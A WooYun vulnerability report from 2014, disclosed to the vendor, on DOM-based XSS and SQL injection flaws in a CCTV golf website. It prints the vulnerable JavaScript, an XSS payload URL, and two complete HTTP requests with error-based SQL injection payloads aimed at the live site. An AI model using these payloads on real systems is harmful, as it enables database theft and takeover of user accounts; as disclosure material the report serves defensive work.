当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083301

漏洞标题:CCTV某站DOM-BasedXSS+多个SQL注入小礼包

相关厂商:中国网络电视台

漏洞作者: BMa

提交时间:2014-11-17 10:17

修复时间:2015-01-01 10:18

公开时间:2015-01-01 10:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-17: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

简要描述:

CCTV某站DOM-Based XSS+多个SQL
影响大概有300+表,账号可能影响央视所有网站用户,例如央视微博:http://t.cntv.cn/login,使用的相同的登录入口
不想深入

详细说明:

DOM-based XSS
页面:http://golf.cctv.com/e/ViewImg/index.html
PAYLOAD:
http://golf.cctv.com/e/ViewImg/index.html?url=javascript:alert%28/BMa/%29
看看index.html的源码:
关键代码:

<script>
if(Request("url")!=0){
document.write("<a title=\"点击观看完整的图片...\" href=\""+Request("url")+"\" target=\"_blank\"><img src=\""+Request("url")+"\" border=0 class=\"picborder\" onmousewheel=\"return bbimg(this)\" onload=\"if(this.width>screen.width-500)this.style.width=screen.width-500;\">");
}
</script>


取request的URL,并且写入到<a>和<img>中,没有任何过滤,构造payload:
http://golf.cctv.com/e/ViewImg/index.html?url=javascript:alert%28/BMa/%29
看看效果:

DOM1.png


DOM2.png


SQL1:

POST /e/extend/court/court_detail.php?courtid=166 HTTP/1.1
Content-Length: 406
Content-Type: application/x-www-form-urlencoded
Cookie: uystmcheckplkey=1415935444%2C4005959c49da7ddf2601a4b1543e3e29%2C2454; PHPSESSID=07arnuunqn4t1u9abmsiov4ag3; uystmreturnurl=http%3A%2F%2Fgolf.cctv.com%2Fe%2FDoInfo%2F; uystmlastforfenid=146n58149
Host: golf.cctv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
courtid=166&plscore%5b%5d=&pltext='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(74)%2cCHAR(115)%2cCHAR(77)%2cCHAR(106)%2cCHAR(87)%2cCHAR(81)%2cCHAR(115)%2cCHAR(119))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&submit=%e5%8f%91%e8%a1%a8%e8%af%84%e8%ae%ba&uid=


SQL2:

GET /e/extend/court/court_search.php?pt='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(98)%2cCHAR(116)%2cCHAR(52)%2cCHAR(80)%2cCHAR(53)%2cCHAR(99)%2cCHAR(114)%2cCHAR(56))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and' HTTP/1.1
Cookie: uystmcheckplkey=1415935444%2C4005959c49da7ddf2601a4b1543e3e29%2C2454; PHPSESSID=07arnuunqn4t1u9abmsiov4ag3; uystmreturnurl=http%3A%2F%2Fgolf.cctv.com%2Fe%2FDoInfo%2F; uystmlastforfenid=146n58149
Host: golf.cctv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*


注入1.png


注入2.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-17 11:36

厂商回复:

非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~

最新状态:

暂无


漏洞评价:

评论